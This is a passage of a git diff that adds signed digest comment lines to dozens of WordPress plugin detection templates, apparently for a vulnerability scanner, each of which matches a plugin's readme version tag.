490a004630440220141b3c44c36dec18cd5cf8ff0923ffb4fd0a0ce1ef846441be825fa92ff0887c02206d33bf3312fa4f2a21ff04fb35d8adcff41f5f3b4ea85331683db03c70171cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..a4d3920093 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6d0c781dadc38999555235fe560eace14eed131d3a39a0086b367de14aef9da02206648d71b8b69d6ebd3c6ee46f67086951d0d4dab6ea60ec9932e2aba44add4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..33e2b97037 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000be16170ed47e29b8b7366b7cb1eac8bd10d1c7b87394712bf2c1d714236de002210094e56d61343fe454915065b8d3c11c859b0808b07e7aff9d181b2dd727749dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..2ee5ed0a10 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201813910139681312b8aca80f92c4a94c9b60c1409da31c74b3e256cc4e831518022100f8bcd4057019dbc4af581e4b94a739e8402eabde3c5bb683f2c46211a9349d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..7b7cde1ead 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008422069f96e979ba2445298b6e4d0fd7652953c80ffe82be1713fdd4512e26fa0220639c5c21f7c92a2c58392a1cac76c0d9070e72591cd5197d672c3674148f7a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..2b894e8260 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205755bab67c356c5c3b37a9a1ded30dd01f395bde3c6a0fc2a23061a42da2b081022100adb1ee4aa603f7a652c7e28dd9da2d459ec27cfc3204c90cf00f6b68008193fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..99b60c0d02 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004400237aa2306ef2d33235812b3d8211caeb87f4e4fffa1283ed828788cbf4f022100e6647e859243a8796f87487a31ead050d7881e03a4d3309c5a3e70135950e0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..d2d33e70a2 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8b8836654e1f904e8571679d41c4381d7db8f2187f414488f90178a4cb3ccba0220127874a8427042394c9ad32bf2f2378cef5a6323407b581ec4807fe8313380a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..747597fe24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206563f74fdc7289aa01f33e1e4e13d5b9b04fb9c354ba7ccca462f66583784e000221008a617378cffe449d7f34140cadac89ebe0576d362a7057476bab5f76d600f79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..0156b96c0a 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089a7cf594ac15b59203112e1079f7e5d79e734dd29b7bb4d64c73038ceafe9cf0220667227832e0c8ac451c07a99420662f9f7987a63221fdb586b3882eeae13aaa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..96dd740e48 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203335336ce82488c544e4a3526ed55285b78dec6140a374491b9d240c9d21560b022100bd9ff8844226c8dcc0b90d0380075d8c831783c5b5ac3ce919036023e29b6f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..9cce25fb38 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5cd0aee0d0ad42173e5efb8bcb9404ff4f2bc6ee08376ed44554a283f39fd0e022100a815d633e41e4bcde4f58128414cb6a5e7e64f69edcc6b40a39a10dee9ca7489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..31041e3991 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210092a5a5b3a65d200cbaef3172dd567246fd693054723fdaa164edfda3e13a3420022100fd6d0af8ddea1d8b8355788ce2b4c3e86dc0a1b25e7d06799700add87b6c8f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..bb38fa074d 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200215bff7e2dfaf0ca23d8ce30bba181b7b3e15615657381ead57d5abe45760ff022100b845aec40f2cb0539fa1854baf568437a0befe0f371e4482ad10bfb9dd8aebb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..3160138941 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200eb21eb71677b02888c973ab210cbde34705205a2122f6caa24f5137cab3008c022100d2dea8c52f211de2f8eec6e4e08b5b5670084e6829d28cbd24f925dd486fb041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..471a2a3420 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d32c80d1bb55756ac9a2d5763b6cd2dad7ba7f27521b767fe9d9b47205a8d611022100cccf6fa2e1dddfe0d943f5d1fdfd9a5ddbf88fb5428bb9eb8387cf8bf086ec3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..653eb07637 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004dc8b2c191923e9d44268cf3c8b3689e839d4b075dd41229046c7d942469b8f02204cc2b00610d23d6d1ac91b1673a74bcaa21f3a34bd413bb12ad6ffa3e6f577a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..7a69488010 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee3788b509ff21b9b0a12cf5acfd70278ed056ec132330957cc9608fa2863a3402203e7f0cc571ae68a66855becb8d42fcbd57b95d7bec7c83c68890c2b7c1b4868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..42607b81fe 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202cbf0b7784d15313ce5d5f9173e2e76c31ed4c138488cca9c48c2675c549d51b02206f2bd2a80ca10339f62f16e911e5d7278ee57ec12600ddef76eee919de23499f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..5874b7de07 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d5a6028989e76b86e8f405107f784686c06f6ea5b0510285942ad0ef6068458022100e2c12b741672313c513dcf3913cbb65f79dfbe85b6d0bbfea0ded8850cec67d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..6b90c6adcf 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205495d064328450f947e304882e24eb98d34b1e5b3237d968d715876e678aab6102203c7c25ae89debb59fdbcaed86e227e87722d79fbf948085b20a79fa84db955a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..5be09a440c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203362eaa84c19aa9effdb58be55d876d78e4d261d89939b64d3c770920c156db90220499b53032c658e9d65c2d9c14a45b364c24f8d78a4f63727619cf9808a7e9230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..cf543e2f5b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a822b8e885d31348620503a366c6827fc43bc2736149b488aaf5398ada891101022100cfa4b9c3970ebc686d4b4d5806c4c0714c1599247d7b581bbf1c0bcd12f0b8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..e8cd51e9b7 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100899646fb58ca55c8af1573c73311c5cbc5020016efe3482f2451d24bbe643c9902201b046fd8deb15bb2772d064c055f52944b1adc85d145f5bb3415f66b04abeeeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..125c514436 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200603df7012a0c694d202df7193bf4e601887eb7da822edec2c3d42f355331e57022100f032752ad623260dea582c3625aa84d3d820e3e4a0f0ef8e935e79ec28f7d3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index fea9594fa0..21675ac7d0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079e61d334f704133e6a213c0409f284951c534dad0b2297304351842e1fa634e02210087e043d171bb4e49da7073e885ba6c1f2cbd1faef25dc9ba09a27a2640fc7aa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..9e0a2d2dc1 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096b7e852669276b39f1208b5fb15624b2f3fa0e8d51c6346927e55fd39227494022100d679a1e7d25c245e79fe99790436b5ab89a4b528d4566021e3098d14c8e7e107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..5ac7b893aa 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205047a1157073d472933296fc49207314ee572050ec791dd938af87e4dfca8232022100ce654a8ef8024fc46c749ae5b73b997726fa85c026cb5db4028fb61ef0d0ef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..cd9f0bd338 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3a1f48d956ae2aaa39024dd6245e39be9d3b988440b442dccbe1fdee8fe5ecc022063076cfa9be5b35fd27b9cbc24926f445ad3d873d4b8b4939d914b9e9ba9291b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..e29e261f6e 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100994d84c406d494d38dd5cd057bf210ac2ae4ae05b636e2d7d98b7ebd1cc335cc022100e1a5d4534c826821b07ff1a435d06615c0ffd9b7569dd801b57f5466dd221667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..7afe144d9e 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220385c1811bcec6332300dd5df639f2843cedcb6d0508ec5760ce698c89f3abc0f02204c8d9a58a0961f17bac7b62ff3bc13d1a435c913ed8140d902754de661365051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..d975042851 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1081253d6776c448817050b6c41deae47288c6e4dc8f34c60325b31a0c6963e0221009fafe882a64f17a2381140294f4ac65b5f81f6aa889ac30091abe0c470e62782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..3e697f9431 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a947f1ac5fd707778e27cb39a1e61e13a8075a65f8d648b5e8b55f0de5ad57702210092824f1d4f9e13cfc187a1d7d9ba735658df72aa19499696ab4fbdde91ce4250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..fe90b06ab2 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220307d9dc73b2604f75c1e453e4e9e2eabfd85bc63bb880b5fa1762dd4dea7c5de022100b5bbb8749dc94405fb46d2ba07a55696c5e9485dc4ed8a9ce1c84b3baaf1eb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..291f63f23d 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d953daada5684cef06ffd819d1602e6ee476f2bad0bb0adcc6849d84865afc2c022000fd3b6d82b4bef65000ae8232ff1452a59d6d2c04970125aecda2158d6d573b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..8b9fc92729 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057b1096098b14b4450f553467b3d9ec792d97e58731d9f27810ca0978dfa9d8a0220429ad9afc92a058d8fba49cb3e129666264d023c784b59e975e4f00164db265e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..3fd3339a92 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220110a0057d72abba78447ed768bda072efb31780d1f0a59074d1ca82a79c71d8702202cb1b8838b6cca1c90a9e24fa730f82b5ae4772bba7c01188b9d29d2526aa0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..2dcf8c57dc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bdf58649ab6d9fbce27e4eb914a5dfaae4f005f4d9ccd38c6dd342a1712f936f02203cca14a4e6b708a212a5af06df3aa0dbb7dfdd4c4205fc3a2c8d5101bc9ecbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..b5adb7aec7 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004a757f6c2f0f1bfab7ea91d4b1e5bd8022e4bbaec0f5155cc2ce1cf44826b53022100db2633b1ddd771a21ef90597213a6e7d1b91fe9eb0023d78a3ae93d96ea34726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..f5552cb020 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d794915171ea24e3e4bb0f70591cdd8026c16d873d0b7ce7b22077ddff4bd56a022100fcaf2c8bcd082964e2cb78f81113e6a2d15095abf7f5709b58c8eb98350181f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..71e4d8667c 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f107ea871d0453868dfa520f0795b7fea1356df8384f46280fe55864c137b2a022044e6966b7eaf40e53770aa1b1c96815474478e24a9528e84935db1db3e546066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..492dc3657a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048cf9a5d168fb9f888079eaff2139fc5121e8e9051f08b45ce91a2a50f6aa694022100c46377eae0fbb3603c7f7e619d335949fb33b8862813a4d77f3c37a8e459970f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..e48aaaf75a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b0a84d55aa771b7112d157cb3c025f350b5e9526c857405c1fc7cd830a6424402201739b113256e797b47230d44d4c3b0b69147759cb36eb0f1a4def5b587509c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..68e83b40db 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c1f9df57540a1c8aa282acebd76ef06518061a87180dc2b85f0b11669a9b32e022100c7f1a65d3d42830272cd6961d4669b5d7b8835a21f58e6931ad1116856d5cc7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..241b130bfe 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025647f73e1f3dc64b9b845b17a00e71ffe624b89e0b752ba3764f16bf0b5b57c022100eedc0a2eafbff551a16b46b6c19c1ed48d0f7db7e164b2b71c8e96b77cbbd93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..1efd2e346f 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e373449db06ecbc38d4995c4dc22aecea32e24a1990f9f0ff82744eca3c429b6022100b726937e91c3a9ba00a59af43e87c00c2b49f7e82c71375d7c198ca1005bc91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..fc33bc109d 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046d634aed143751a1111d8c937c2fff71d5de6108831bb48d485146f046f7a43022100ba9dc437e5b8ff864c39723bc16c455f601cd845753ff90ed6fc689cc18ce5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..2c03590415 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 